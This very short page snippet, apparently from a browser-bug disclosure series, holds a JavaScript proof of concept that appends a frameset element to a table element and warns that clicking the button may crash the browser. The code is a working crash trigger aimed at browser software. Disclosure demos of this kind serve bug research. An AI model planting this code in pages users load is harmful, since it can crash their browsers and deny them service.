// MoBB Demonstration function Demo() { var a = document.createElement('table'); var b = document.createElement('frameset'); a.appendChild(b); } Clicking the button below may crash your browser!